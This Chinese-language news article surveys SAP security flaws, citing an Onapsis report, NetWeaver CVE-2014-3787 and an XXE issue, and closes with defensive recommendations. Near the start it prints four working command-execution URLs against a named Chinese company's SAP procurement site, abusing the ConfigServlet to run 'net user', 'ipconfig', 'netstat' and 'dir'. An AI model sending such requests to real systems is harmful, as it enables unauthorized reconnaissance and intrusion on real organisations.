SAP管理系统隐患不断 细数这些年的安全事件

在前些年我们不太注重企业管理的安全，但是随着斯诺登事件的爆发，国家开始对安全可控进行重新定义，安全问题一夜之间成为全民热议的焦点，作为全球知名的管理软件厂商SAP，却在系统上安全漏洞不断。

上个月SAP系统又出事儿，一安全博客爆出，中国华能集团公司电子商务网站系统存在漏洞，访问url：http://srm.chng.com.cn/HnSrmWebO/index.jsp，该网站采用sap系统，由于未及时更新补丁，导致存在命令执行漏洞，如下

构造语句可查看网站服务器上的系统用户账号信息：http://srm.chng.com.cn/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd%20/c%20net%20user

查看服务器ip地址信息 http://srm.chng.com.cn/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd%20/c%20ipconfig%20/all

查看服务器上端口开放信息：http://srm.chng.com.cn/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd%20/c%20netstat%20-an

查看系统磁盘上目录文件信息： http://srm.chng.com.cn/ctc/servlet/ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd%20/c%20dir%20c:

全球95%的SAP企业管理系统存在安全漏洞可能导致严重的数据泄露

根据Onapsis的调查报告，全世界超过25万企业因SAP系统中存在的一系列安全漏洞而受到影响，可能导致严重的企业数据泄露。SAP是世界上最受欢迎的企业应用软件企业和解决方案提供商，为85%以上的全球500强企业和190个国家的282,000+家客户提供解决方案。

漏洞原因

最近在对SAP解决方案提供商进行的一项研究显示，超过95%的企业SAP存在严重的安全问题，这些问题将它们置于网络攻击风险之中并可能导致严重的数据泄露。影响包括98%的100个最有价值的品牌在内，全世界超过250000个SAP业务客户都因SAP系统中的一系列漏洞而暴露在网络攻击之下。

Onapsis首席执行官Mariano Nunez说：

“最令人惊讶的是，因为SAP操作团队和IT安全团队之间的责任差距，大多数公司的SAP网络安全都面临着威胁。事实上，应用的大多数补丁都与安全无关、发布过迟或者引入了进一步的操作风险。”

该研究还报告说，在2014年SAP发布了391个安全补丁，而它们中的50%以上都被评定为高风险漏洞。

攻击方式及影响范围

针对SAP应用程序的主要网络攻击（也就是系统弱点）分为以下几类：

1. 核心网络：执行远程功能的模块。

2. 数据仓库：为了获取或修改SAP数据库中的信息，利用SAP RFC网关中的漏洞执行管理员权限指令。

3. 门户网站攻击：利用漏洞创建J2EE后门账户，以访问SAP门户和其他内部系统。

报告中提供了针对SAP系统最常见的三种网络攻击的细节信息，这些攻击向量使得黑客可以入侵SAP系统并能够访问公司数据的应用程序。经过专家研究确认，网络攻击将会严重影响以下关键业务进程：

1. 在SAP系统之间使用Pivoting，造成客户信息和信用卡信息泄漏。

2. 客户和供应商门户攻击。

3. 通过SAP私有协议对数据仓库发起攻击。

根据Nunez所说，SAP HANA应该对新增加的450%的安全补丁负责：

“这一趋势不仅仅是持续的，而是随着SAP HANA更加恶化，因为SAP HANA导致新的安全补丁增加了450%。因为SAP HANA位于SAP生态系统的中心，所以存储在SAP平台的数据现在必须同时在云端和前端进行保护。”

安全措施

该报告还提供了以下行动计划，用以提高SAP系统的安全级别：

1. 获取基于SAP资产的可视化功能，以确定“风险价值”。

2. 通过持续监控以防止安全性和遵从性问题。

3. 检测并应对新威胁、攻击或用户异常表现作为攻击的指示器。

为了保护SAP软件，遵循任何SAP安全记录和监控内部体系结构非常重要，这能够有效预防一些安全问题。

而SAP存在安全问题并非今天就有，在2013年SAP就被俄罗斯安全研究人员爆出Netweaver漏洞导致用户表泄露，该漏洞可能导致攻击者获取中央用户管理表的访问权。

　　作为一套面向服务的集成平台方案，SAP NetWeaver此次遭遇的漏洞细节(CVE-2014-3787)由安全企业PT Security公司严格保密，这家安全厂商会定期对SAP套件进行检测。 　　中央用户管理功能旨在简化对由不同客户端托管的多个用户账户的管理流程。SAP公司是目前人气最高的商务应用程序供应商之一，财富五百强企业中有四分之三使用该公司的产品。 　　Dmitry Gutsko指出，此次曝光的敏感信息泄露漏洞会影响到NetWeaver 7.20以及更早版本。 　　“一旦成功利用此漏洞，攻击者将能够通过附属系统读取来自SAP中央用户管理体系中的任何表信息，这可能会导致存储在全部CUA系统中的用户数据遭到泄露，”Gutso在一篇博文中解释道。 　　建议用户利用最新发布的NetWeaver安全补丁来修复这一漏洞。 　　SAP用户一直对该公司部署方案的更新与安全保护机制抱怨不休。去年ERP Scan公司创始人Alexander Polyakov曾经发现，当时成百上千家企业在运行着存在漏洞的陈旧SAP产品版本，而且内部信息完全暴露在公共互联网之下。 　　Polyakov发现不少客户所运行的NetWeaver j2EE版本当中都包含关键性漏洞，可能允许攻击者在无需认证的前提下执行操作命令。 另外这家安全公司还报告称SAP NetWeaver的GRMGApp中存在关键性XML External Entity(简称XXE)漏洞，这相当于为未经授权的访问敞开了便利之门。 而在此时不断爆出安全问题，对于SAP在企业选择会受到一定影响，特别是在去IOE行动从概念走向落地的当下，SAP不能只有价格最高，在安全防范上也在配得起他高大上的价格才行。